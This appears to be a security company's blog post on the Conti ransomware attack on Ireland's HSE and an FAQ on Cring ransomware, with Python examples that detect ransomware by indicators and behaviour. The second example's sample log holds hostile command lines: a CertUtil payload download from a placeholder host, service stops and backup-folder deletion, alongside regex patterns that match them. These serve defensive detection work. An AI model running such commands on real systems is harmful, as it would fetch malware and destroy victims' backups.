In the early hours of May 14th, it was revealed that a sophisticated ransomware attack had taken place against the IT systems of the Irish Health Service Executive (HSE). Information is still coming to light, but it is known that a human-operated, externally based threat group deployed a variant of the ‘Conti’ ransomware; this ransomware is considered the successor of the dangerous ‘Ryuk’.
The focus of the operation was to access central servers storing sensitive information for exfiltration and encryption. All HSE IT systems were shut down to mitigate the spread of the ransomware and provide an opportunity for internal HSE resources and the third parties they have engaged to assess the scope of the attack and implement recovery procedures.
The point of ingress for the attack currently appears to be the shared patient registration system common to all HSE-operated institutions. It is suspected that a zero-day exploit was leveraged against this system to gain access and deploy the ransomware. A zero-day exploit may indicate Advanced Persistent Threat (APT) involvement, as often only these groups have the skills and resources required to identify and exploit such vulnerabilities successfully. The presence of a Cobalt Strike Beacon was also suspected. Cobalt Strike is a tool used by threat actors to execute targeted attacks against enterprise environments.
The Sapphire Security Operations Centre (SOC) is continuing to monitor the situation, engaging with our threat intelligence resources to identify threat indicators and will respond to developments and additional information as it becomes available.
The threat indicators available for ‘Conti’ have been integrated into the SOC, with custom rules and alerting implemented. These rules will alert analysts to the presence of files related to ‘Conti’ and communication with C2 sites, URLs, specific user agents and changes to files indicating they have been encrypted by the ransomware. The Sapphire SOC also monitors activity from various tools attackers use, including Cobalt Strike.
Sapphire will continue to gather threat intelligence from various sources, including our threat intelligence partners, who collect intelligence from open and closed sources. As more information becomes available, emphasis will shift from definable and known indicators, such as hash values and IP addresses, to behavioural identification, helping to provide further detection when the specifics of the ransomware and indicators of compromise have been further changed or adapted.
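As an added illustration of the two detection stages just described (definable indicators such as hashes, C2 hosts, user agents and encrypted-file extensions first, then behavioural identification that still fires once those specifics have been changed), the following Python is example code written for this page, not Sapphire SOC tooling. Every hash, hostname, user agent and file extension in it is a constructed placeholder rather than a real Conti indicator, and the JSON-lines event schema is an assumed format, not a vendor's.

```python
"""Indicator-based and behaviour-based ransomware detection over log lines.

Added example for this page, not Sapphire SOC code.  Every indicator value
below is a constructed placeholder (not a real Conti IoC) and the JSON-lines
event schema is assumed, not a vendor format.
"""
import json
import os
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Stage one: definable, known indicators (constructed placeholders).
IOC_HASHES = {"a" * 64}                    # placeholder SHA-256
IOC_C2_HOSTS = {"c2.placeholder.invalid"}  # placeholder C2 hostname
IOC_USER_AGENTS = {"PlaceholderAgent/1.0"}
IOC_EXTENSIONS = {".placeholder_enc"}      # placeholder encrypted-file extension

# Stage two: behaviour that survives changed hashes and domains.  A host that
# renames BURST_THRESHOLD files to a different extension within BURST_WINDOW
# is flagged whatever the new extension happens to be.
BURST_THRESHOLD = 5
BURST_WINDOW = timedelta(seconds=60)


def file_ext(path):
    return os.path.splitext(path)[1].lower()


def indicator_hits(ev):
    """Return (kind, value) pairs for every known indicator the event matches."""
    hits = []
    if ev.get("sha256") in IOC_HASHES:
        hits.append(("ioc_hash", ev["sha256"]))
    if ev.get("dest_host") in IOC_C2_HOSTS:
        hits.append(("ioc_c2", ev["dest_host"]))
    if ev.get("user_agent") in IOC_USER_AGENTS:
        hits.append(("ioc_user_agent", ev["user_agent"]))
    if ev.get("event") == "file_rename" and file_ext(ev["new_path"]) in IOC_EXTENSIONS:
        hits.append(("ioc_extension", file_ext(ev["new_path"])))
    return hits


class RenameBurstDetector:
    """Sliding-window count of extension-changing renames per host."""

    def __init__(self, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
        self.threshold, self.window = threshold, window
        self.recent = defaultdict(deque)  # host -> rename timestamps in window
        self.alerted = set()              # alert once per host, not per file

    def observe(self, ev):
        if ev.get("event") != "file_rename":
            return None
        if file_ext(ev["old_path"]) == file_ext(ev["new_path"]):
            return None                   # ordinary rename, extension unchanged
        ts = datetime.fromisoformat(ev["ts"])
        dq = self.recent[ev["host"]]
        dq.append(ts)
        while dq and ts - dq[0] > self.window:
            dq.popleft()                  # expire renames older than the window
        if len(dq) >= self.threshold and ev["host"] not in self.alerted:
            self.alerted.add(ev["host"])
            return ("behaviour_rename_burst", len(dq))
        return None


def run(lines):
    """Apply both stages to JSON log lines and return the alerts raised."""
    alerts, burst = [], RenameBurstDetector()
    for line in lines:
        ev = json.loads(line)
        for kind, value in indicator_hits(ev):
            alerts.append({"kind": kind, "host": ev["host"], "value": value})
        hit = burst.observe(ev)
        if hit:
            alerts.append({"kind": hit[0], "host": ev["host"], "value": hit[1]})
    return alerts


def rename_event(ts, host, old, new):
    return json.dumps({"ts": ts, "host": host, "event": "file_rename",
                       "old_path": old, "new_path": new})


# Constructed sample log: a beacon, a dropped binary, a burst of renames on
# ws-02 (unknown extension, caught by behaviour only) and one known extension.
SAMPLE_LOG = [
    json.dumps({"ts": "2021-05-14T02:00:00", "host": "ws-01", "event": "net_conn",
                "dest_host": "updates.example.com", "user_agent": "Mozilla/5.0"}),
    json.dumps({"ts": "2021-05-14T02:00:05", "host": "ws-01", "event": "net_conn",
                "dest_host": "c2.placeholder.invalid", "user_agent": "PlaceholderAgent/1.0"}),
    json.dumps({"ts": "2021-05-14T02:00:10", "host": "ws-01", "event": "file_write",
                "path": "C:/Users/Public/svc.exe", "sha256": "a" * 64}),
] + [
    rename_event(f"2021-05-14T02:01:{i * 10:02d}", "ws-02",
                 f"share/finance/q{i}.docx", f"share/finance/q{i}.docx.zzz")
    for i in range(6)
] + [
    rename_event("2021-05-14T02:05:00", "ws-03",
                 "share/hr/list.xlsx", "share/hr/list.placeholder_enc"),
]

if __name__ == "__main__":
    for alert in run(SAMPLE_LOG):
        print(alert)
```

The point of the second stage is visible in the sample: the renames on ws-02 use an extension that is in no indicator list, yet the host is flagged on the fifth rename inside the window, while a single rename on ws-03 is caught only because its extension is already known. In production the threshold and window would be tuned against the normal rename rate of file servers to keep false positives down.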
Zero-day vulnerabilities, whilst rare, can offer attackers a method of successful exploitation. Mitigating steps can be taken to limit the likelihood of success:
- External-facing services, such as portals, registration pages and hosts, should be kept updated with the latest operating system and application patches and configured securely.
- Internet-facing remote access should be restricted and placed behind a Next Generation Firewall, enforcing encryption and supporting multi-factor authentication.
- Granular role-based access control (RBAC) will reduce the likelihood of any one account being able to perform the entire attack.
- Deploying Endpoint Detection and Response (EDR) can help prevent malware and exploits targeting zero-day vulnerabilities.
- Multiple back-ups should be produced, with at least one stored offline. Back-up data should be regularly tested for reliability.
Frequently Asked Questions on Cring Ransomware
- How Does Cring Ransomware Infect an Organisation’s Network?
When Cring operators obtain the IP addresses of internet-facing vulnerable devices, an unauthenticated attacker can connect to the appliance over the public internet. The attackers then remotely access a session file containing the username and password, stored in clear text.
Cring operators use fairly sophisticated techniques to hide their files, inject code into memory and cover their tracks by overwriting files with garbled data or deleting logs and other traces that threat hunters could use to investigate them.
- What are Some Cring Ransomware Techniques?
a). Initial Access
Cring initially gains access either through insecure or compromised RDP or through legitimate accounts. The ransomware can also enter the system by exploiting certain vulnerabilities.
The threat has recently evolved to use the previously known Adobe ColdFusion vulnerability (CVE-2010-2861) to infiltrate the ColdFusion server remotely. In the past, Cring was also utilised to exploit a FortiGate VPN server flaw (CVE-2018-13379).
b). Credential Access
The threat actors behind Cring carried out their attacks using weaponised tools. Mimikatz is one of these programs, and it was used to collect login information from users who had already signed into the system.
c). Lateral Movement and Defense Evasion
Cobalt Strike was used to move laterally. Additionally, this tool was used to distribute BAT files that are employed for various purposes, including weakening the system’s defences.
d). Command and Control and Execution
Cobalt Strike was used to maintain continuous communication with the primary command-and-control (C&C) server.
BAT files were used to download and run the Cring ransomware on the other systems in the compromised network. The threat also uses the Windows CertUtil program to assist with this download.
When Cring is run on a computer, it stops any services and processes that could interfere with the ransomware’s encryption operation. The threat also deletes backup folders and files, making it challenging for the victim to recover the encrypted files, increasing the pressure on them to pay the ransom. After the ransomware finishes its encryption process, it will use a BAT file to remove itself.
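The execution steps in sections c) and d) above, namely CertUtil being used to fetch the payload, services being stopped ahead of encryption and backup folders being deleted, each leave a process-creation record that a SOC can match on, and a host that walks the whole sequence deserves a single higher-severity alert. The Python below is an added example written for this page, not Sapphire's or any vendor's rule set; the events are constructed Sysmon-style records, and every hostname, path, URL and service name in them is a placeholder.

```python
"""Process-creation detection for the Cring execution chain described above.

Added example for this page, not Sapphire's or any vendor's rules.  The
events are constructed Sysmon-style records; hostnames, paths, URLs and
service names are placeholders.
"""
import re

# Per-event rules, one for each step of the chain the FAQ describes: CertUtil
# fetching a payload, services being stopped, backup folders being removed.
RULES = {
    "certutil_download": re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "service_stop": re.compile(r"\bnet1?\s+stop\b|\bsc(\.exe)?\s+stop\b|\btaskkill(\.exe)?\b", re.I),
    "backup_deletion": re.compile(r"\b(rmdir|rd|del)\b.*\s/s\b.*backup", re.I),
}

# Order of the steps; a host seen performing all three in this order gets one
# chain alert on top of the per-rule hits.
CHAIN = ["certutil_download", "service_stop", "backup_deletion"]


def match_rules(event):
    """Return the names of every rule whose pattern matches the command line."""
    cmd = event["command_line"]
    return [name for name, pattern in RULES.items() if pattern.search(cmd)]


def detect(events):
    """Run the rules over process-creation events; return rule and chain alerts."""
    alerts = []
    progress = {}  # host -> chain stages seen so far, in order
    for ev in events:
        hits = match_rules(ev)
        for name in hits:
            alerts.append({"kind": name, "host": ev["host"], "ts": ev["ts"],
                           "command_line": ev["command_line"]})
        stages = progress.setdefault(ev["host"], [])
        # Advance the chain only when the next expected stage appears.
        if len(stages) < len(CHAIN) and CHAIN[len(stages)] in hits:
            stages.append(CHAIN[len(stages)])
            if len(stages) == len(CHAIN):
                alerts.append({"kind": "ransomware_execution_chain",
                               "host": ev["host"], "ts": ev["ts"],
                               "stages": list(stages)})
    return alerts


def proc_event(ts, host, command_line):
    return {"ts": ts, "host": host, "user": "CORP\\svc_placeholder",
            "command_line": command_line}


# Constructed sample: ws-05 walks the full chain; ws-06 uses CertUtil
# legitimately (hash check) and stops one service, which must not chain.
SAMPLE_EVENTS = [
    proc_event("2021-05-14T03:00:00", "ws-05", r'"C:\Windows\System32\cmd.exe" /c dir C:\Users'),
    proc_event("2021-05-14T03:00:10", "ws-05",
               r'certutil.exe -urlcache -split -f http://placeholder.invalid/p.bin C:\Users\Public\p.bin'),
    proc_event("2021-05-14T03:00:30", "ws-05", r'net stop "PlaceholderBackupSvc" /y'),
    proc_event("2021-05-14T03:00:31", "ws-05", r'net stop PlaceholderDB /y'),
    proc_event("2021-05-14T03:00:40", "ws-05", r'"C:\Windows\System32\cmd.exe" /c rmdir /s /q D:\Backups'),
    proc_event("2021-05-14T03:10:00", "ws-06", r'certutil.exe -hashfile C:\Temp\installer.msi SHA256'),
    proc_event("2021-05-14T03:10:05", "ws-06", r'net stop Spooler'),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["kind"], alert["host"], alert.get("command_line", alert.get("stages")))
```

The per-rule hits on their own are noisy (administrators stop services and CertUtil has legitimate uses, as the ws-06 events show), which is why the chain alert exists: it only fires when the steps appear in the order the ransomware uses them. The regular expressions are deliberately loose so that renamed batch files or reordered switches do not evade them; tightening them is a tuning exercise against the environment's own baseline.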
- What is Cring File Decryption?
Decrypting Cring-encrypted files is straightforward in principle, but it can only be carried out with a matching decryption key obtained from the attackers behind the infection.
You should not send money to hackers to regain access, as you may still be left with many inaccessible files or a non-working decryption key.
- How Do I Keep Systems Protected from Cring Ransomware Attacks?
Experts recommend several measures to keep systems safe from Cring operators, including:
- Updating the VPN gateway firmware to the latest versions
- Updating the endpoint protection solutions and their databases to the latest versions
- Restricting VPN access between facilities and closing all ports that are not required for operations
- Ensuring all modules of the endpoint protection solutions are enabled
- Configuring the backup system to store backup files on a dedicated server
- Ensuring the Active Directory policy only permits users to log in to the systems their role requires
- Implementing Endpoint Detection and Response-type security solutions on IT and OT networks to enhance the organisation’s resistance to potential ransomware attacks
- Adopting Managed Detection and Response services to gain access to the highest skill levels and knowledge from professional security experts
- Incorporating dedicated protection for industrial processes